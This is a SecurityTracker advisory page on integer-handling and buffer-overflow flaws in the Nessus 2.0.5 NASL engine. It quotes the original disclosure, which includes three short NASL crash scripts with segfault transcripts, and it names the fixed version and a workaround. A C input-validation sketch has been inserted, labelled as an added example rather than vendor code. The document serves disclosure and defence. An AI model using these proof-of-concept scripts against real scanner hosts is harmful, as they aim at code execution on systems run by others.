SecurityTracker.com
Category:   Application (Security)  >   Tenable Nessus Vendors:   Deraison, Renaud et al
(Additional Details Are Provided) Re: Nessus Scanner Input Validation Flaws in libnasl and libnessus May Let Local Scripts Execute Arbitrary Code
SecurityTracker Alert ID:  1006828
SecurityTracker URL:  http://securitytracker.com/id/1006828
CVE Reference:   CVE-2003-0372, CVE-2003-0373, CVE-2003-0374   (Links to External Site)
Updated:  Jan 21 2004
Original Entry Date:  May 23 2003
Impact:   Execution of arbitrary code via local system, User access via local system
Exploit Included:  Yes  
Version(s): 2.0.5 and prior versions
Description:   A vulnerability was reported in the Nessus security scanner in libnasl. A local user's Nessus script may be able to execute arbitrary commands on the scanner host.

It is reported that a local user with a valid Nessus account and the ability to upload arbitrary Nessus plugins can upload a specially crafted script that can break out of the security sandbox and execute arbitrary commands on the operating system. The ability to upload arbitrary Nessus plugins is reportedly disabled by default ('plugins_upload' option should be set to 'no' in nessusd.conf).

According to the report, a malicious script can trigger this vulnerability by sending invalid parameters to the insstr() and ftp_log_in() functions and also to other nasl functions. Some similar flaws were reported in libnessus.

The vendor credits "Sir Mordred" <mordred@s-mail.com> with discovering some of these flaws.

In a separate message [see Message History], Sir Mordred provided additional details about the vulnerable functions.

In the insstr() function, a negative value for the fourth argument can trigger the flaw. A demonstration exploit transcript is provided:

$ cat t1.nasl
insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);

$ nasl t1.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
[1384](t1.nasl) insstr: warning! 1st index 3 greater than 2nd index -3
Segmentation fault (core dumped)

In the scanner_add_port() function, a buffer overflow can reportedly be triggered by a long 'proto' argument, as shown in the following demonstration exploit transcript:

$ cat t2.nasl
scanner_add_port(port : 80, proto : crap(data:'A', length:300));

$ nasl t2.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)

Finally, a buffer overflow in the ftp_log_in() function can reportedly be triggered by long 'user' and 'pass' arguments, as illustrated below:

$ cat t3.nasl
ftp_log_in(socket : open_sock_tcp(21), pass : "11", user:
crap(data:'A',length:8192));

$ nasl t3.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)
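
As an added example (not Nessus or libnasl code), a C sketch of the validation the three issues above lack: a hardened stand-in for insstr() that rejects the negative index the advisory's 0xfffffffd turns into, instead of warning and continuing, and a bounded copy into a fixed 'proto' field of the kind a scanner_add_port()-style routine would hold. The insstr semantics (replace s[i1..i2] with r), the 16-byte cap and the make_crap() helper are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for NASL's crap(data, length): n copies of c, NUL-terminated. */
char *make_crap(char c, size_t n)
{
    char *p = malloc(n + 1);
    if (p) { memset(p, c, n); p[n] = '\0'; }
    return p;
}

/* Hardened stand-in for insstr(s, r, i1, i2), assumed to replace s[i1..i2]
 * with r. Script integers reach C as signed ints, so 0xfffffffd is seen as
 * -3; rather than warn and carry on, reject any index outside [0, len). */
char *safe_insstr(const char *s, const char *r, int i1, int i2)
{
    size_t len = strlen(s), rlen = strlen(r);
    if (i1 < 0 || i2 < 0 || i1 > i2 || (size_t)i2 >= len)
        return NULL;                        /* rejected: nothing is copied */
    size_t tail = len - (size_t)i2 - 1;     /* bytes after s[i2] */
    char *out = malloc((size_t)i1 + rlen + tail + 1);
    if (!out) return NULL;
    memcpy(out, s, (size_t)i1);
    memcpy(out + i1, r, rlen);
    memcpy(out + i1 + rlen, s + i2 + 1, tail + 1); /* tail plus NUL */
    return out;
}

/* A fixed 'proto' field of the kind a scanner_add_port()-style routine
 * might hold (16 bytes is an assumed cap). Refuse input that does not fit. */
int proto_check(const char *src)
{
    char proto[16];
    size_t n = strlen(src);
    if (n >= sizeof proto)
        return 0;                           /* too long: refuse, not truncate */
    memcpy(proto, src, n + 1);
    return 1;
}

int main(void)
{
    char *a = make_crap('A', 300), *ok = safe_insstr("aaaaaaaaaaa", "bb", 3, 5);
    printf("insstr(s, \"bb\", 3, -3): %s\n", safe_insstr("aaaaaaaaaaa", "bb", 3, -3) ? "ok" : "rejected");
    printf("insstr(s, \"bb\", 3, 5): %s\n", ok);
    printf("proto of 300 'A': %s\n", proto_check(a) ? "ok" : "rejected");
    free(a); free(ok);
    return 0;
}
```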

Impact:   A local user with script upload privileges can execute arbitrary commands on the system. The commands will run with the privileges of the Nessus scanner (nessusd).
Solution:   The vendor has released a fixed version (2.0.6), available at:

http://www.nessus.org/nessus_2_0.html
http://ftp.nessus.org/nessus/nessus-2.0.6/
ftp://ftp.nessus.org/pub/nessus/nessus-2.0.6/

Vendor URL:  www.nessus.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry is a follow-up to the message listed below.
May 23 2003 Nessus Scanner Input Validation Flaws in libnasl and libnessus May Let Local Scripts Execute Arbitrary Code



 Source Message Contents

Subject:  nessus NASL scripting engine security issues


// @(#)Security advisory: Nessus NASL scripting engine security issues

Release date: May 23, 2003 
Name: Nessus NASL scripting engine security issues
Author: Sir Mordred <mordred@s-mail.com>

I. DESCRIPTION

The "Nessus" Project aims to provide to the internet community a free,
powerful, up-to-date and easy to use remote security scanner.
Nessus is very fast, reliable and has a modular architecture that allows
you to fit it to your needs. 
Please visit http://www.nessus.org for more information about Nessus.

II. DETAILS

There exist some vulnerabilities in the NASL scripting engine.
To exploit these flaws, an attacker would need to have a valid Nessus
account as well as the ability to upload arbitrary Nessus plugins in the
Nessus server (this option is disabled by default) or he/she would need to
trick a user somehow into running a specially crafted nasl script.

Note that these issues can NOT be exploited by a tested host to crash
nessusd remotely.

* ISSUE 1 - Integer handling vulnerability in insstr() function

Vulnerability is triggered by a negative fourth argument:

$ cat t1.nasl
insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);

$ nasl t1.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
[1384](t1.nasl)  insstr: warning! 1st index 3 greater than 2nd index -3
Segmentation fault (core dumped)

* ISSUE 2 - Buffer overflow in scanner_add_port() function

Overflow is triggered by very long 'proto' argument:

$ cat t2.nasl
scanner_add_port(port : 80, proto : crap(data:'A', length:300));

$ nasl t2.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)

* ISSUE 3 - Buffer overflow in ftp_log_in() function

Overflow is triggered by very long 'user'/'pass' arguments:

$ cat t3.nasl
ftp_log_in(socket : open_sock_tcp(21), pass : "11", user:
crap(data:'A',length:8192)); 

$ nasl t3.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)

III. VERSIONS TESTED

Linux RedHat 7.2

$ nasl -v | grep nasl
nasl 2.0.5

IV. VENDOR STATUS

New nessus 2.0.6 packages fix these issues.

V. WORKAROUND

Make sure the option 'plugins_upload' is set to 'no' in nessusd.conf and
don't run untrusted nasl scripts.

VI. CREDITS

Hank Leininger <hlein@progressive-comp.com> requested the source code audit
for some opensource projects and for nessus in particular.

Sir Mordred <mordred@s-mail.com> discovered the issues.

Renaud Deraison <deraison@nessus.org> fixed them in an hour after being
notified.

VII. ABOUT

I am offering an absolutely free source code audit for open-source
products. The programming languages acceptable for audit are: Perl, Python,
PHP, ASP, C/C++, Java. I will accept almost any code in these languages
which runs on Unix/Windows platforms.

All you need is to send an email to mordred@s-mail.com with the subject
"Security audit: source code"
and you will get a form in which you answer several questions, such as
the description of the product, the details of obtaining the source code,
the acceptable period of audit and so on.

After the audit, you will receive a full description of the vulnerabilities
found, along with advice that will help you fix them properly. When
you have fixed the vulnerabilities, a public security advisory should be
released containing the fix information, in which I will be
properly credited.





Copyright 2019, SecurityGlobal.net LLC